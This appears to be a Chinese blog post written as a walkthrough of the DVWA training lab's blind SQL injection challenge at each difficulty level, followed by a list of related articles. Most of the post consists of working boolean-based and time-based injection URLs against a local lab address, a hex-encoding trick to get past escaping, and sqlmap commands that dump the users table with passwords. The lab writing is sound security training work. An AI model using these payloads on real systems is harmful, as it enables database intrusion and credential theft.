dvwa第二题:SQL Injection(Blind)

最新推荐文章于 2023-04-05 15:26:49 发布
最新推荐文章于 2023-04-05 15:26:49 发布
阅读量650 收藏
点赞数
分类专栏: main之dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuqangy/article/details/104226012
版权

---level: low---

1.采用bool法(猜具体数据采用二分法)
-- table count
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1%27%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=2--%20&Submit=Submit#

-- table name length
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1-- &Submit=Submit#
                                                            
-- table name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97-- &Submit=Submit#

--table column count , 表名为users
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and (select count(column_name) from information_schema.columns where table_name='users')=1-- &Submit=Submit#

--table column name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>97-- &Submit=Submit#

--table data
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select user from users limit 0,1),1,1))=97-- &Submit=Submit#


2.采用时间法
--主入口确定
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and sleep(5)-- &Submit=Submit#

--当前数据库名的长度
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if(length(database())=5, sleep(5), 1)-- &Submit=Submit#

-- database name
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if(ascii(substr(database(),1,1))>97, sleep(5), 1)-- &Submit=Submit#

-- table count
http://192.168.43.140/vulnerabilities/sqli_blind/?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2, sleep(5), 1)-- &Submit=Submit#

之后的方法就是重复利用bool法的sql语句,填写在if的条件里挨个爆出信息

 

 

 


---level: medium---
Medium级别的代码利用mysql_real_escape_string函数对特殊符号

\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。执行语句跟low一样。
特殊符号内的数据如果确定了,可以直接写其十六机制数据传值,例如:
1 and (select count(column_name) from information_schema.columns where table_name= 0×7573657273)=8 #,(0×7573657273为users的16进制),显示存在,说明uers表有8个字段。

 

 

 


---level: high---
跟sql输入的high难点一样,但是High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。但由于服务器端执行sleep函数,会使得基于时间盲注的准确性受到影响。

sqlMap:
sqlmap -u "http://192.168.43.140/vulnerabilities/sqli_blind/#" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=hl82sb1n97kl75hun6adsbo6cd; security=low" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump
sqlmap -u "192.168.43.140/vulnerabilities/sqli_blind/cookie-input.php" --second-url "http://192.168.43.140/vulnerabilities/sqli_blind/" --data "id=1&Submit=Submit#" --cookie="id=1; PHPSESSID=bij9f2e5j3bq130k9chgkpkfgc; security=high" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

 

 

 


---level: impossible---

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。

 

引用:https://www.freebuf.com/articles/web/120985.html

yuqangy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入
Senimo
03-22 1216
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入LowMediumHighImpossible Low 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先判断原语句的闭合方式,当输入1'时,提示该用户不在数据库中: 可判断原SQL语句闭合方式为id=...
DVWA的使用4–SQL Injection(Blind)(SQL盲注)
StoriesWine
03-27 2802
DVWA的使用4–SQL Injection(Blind)(SQL盲注) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。 1).low级别 源码: 对参数id没有做任何检查、过滤,存在...
dvwa靶场SQL Injection (Blind)(sql盲注)全难度教程(附代码分析)
最新发布
m0_73248913的博客
04-05 580
dvwa sql盲注
Blind SQL Injection on DVWA(Medium Level)
312小公举的专栏
05-15 1351
Vulnerability: SQL Injection (Blind)与前面的Vulnerability: SQL Injection这两个页面的差别就在于有没有有用的错误信息或者我们已经习惯的反馈内容。 本文的终极任务是获得user和password。 1.简单的输入测试 输入2得到: 输入2 or 1=1得到: 输入 2' or '1'='1得到: 以上说明了 $id = m
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3530
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
2020-12-06-DVWAsql.md
01-24
### DVWASQL Injection知识点详解 #### 一、SQL Injection概念 SQL InjectionSQL注入)是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而...
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 2777
DVWA------SQL Injection (Blind)(SQL盲注)
DVWA靶场通关(SQL Injection(Blind))
m0_56010012的博客
03-21 2102
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 LOW 核心代码 SQL Injection (Blind) Source vulnerabilities/sqli_blind/source/low.php <?php if( isset( $
sqlmap的请求参数
buffedon的博客
07-22 955
这里写目录标Sqlmap直连数据库URL探测HTTP参数--cookie (cookie注入)--user-agent、--random-agent对host探测 Sqlmap 服务型数据库 mysql,mssql,orcale,PostgreSQL 文件型数据SQLite,Access,Firebird 直连数据sqlmap.py -d "mysql://root:123456@192.168.1.105:3306/test1" -f --banner //知道数据库的账号密码**直接
DVWA——SQL Injection (Blind)(low)
分享简单的安全技术
01-11 319
SQL Injection (Blind) 界面 源代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
dvwa-sql injection(blind)
Alter__的博客
05-31 789
盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。         盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。  1.判断是否存在注入,注入是字符型还是数字型 2.猜解当前数据库名 3.猜解数据库中的表名 4.猜解表中的字段名 5.猜解数据 low
DNSlog注入
kukudeshuo的博客
04-17 1793
DNSlog注入 什么是DNSlog 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。 那怎么利用DNSlog进行注入呢?得深入了解一下DNSlog 原理 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理
SQL Blind Injection
土拨鼠挖洞中的博客
06-23 3150
Blind Injection是什么:SQL注入过程中,SQL语句执行后,执行的数据不能回显到前端,此时我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注; 类型基于bool 型:应用程序仅仅根据执行的sql语句返回True(页面)和False(页面); 基于时间型:所以我们利用函数来判断页面是否发生延迟 ,来判断是否发生注入,如果延迟,则执行失败。类似搜索这类请求,boolean注入也无...
dvwa sql injection (blind)
03-16
DVWA SQL注入(盲注)是一种攻击技术,利用应用程序中的漏洞,通过注入恶意代码来获取敏感数据或者控制应用程序。在盲注中,攻击者无法直接获取数据库中的数据,而是通过不断尝试不同的注入语句,观察应用程序的反应来推断出数据库中的数据。这种攻击技术需要一定的技术水平和耐心,但是一旦攻击成功,将会对应用程序和用户造成严重的损失。因此,开发人员和管理员需要采取措施来保护应用程序,避免SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值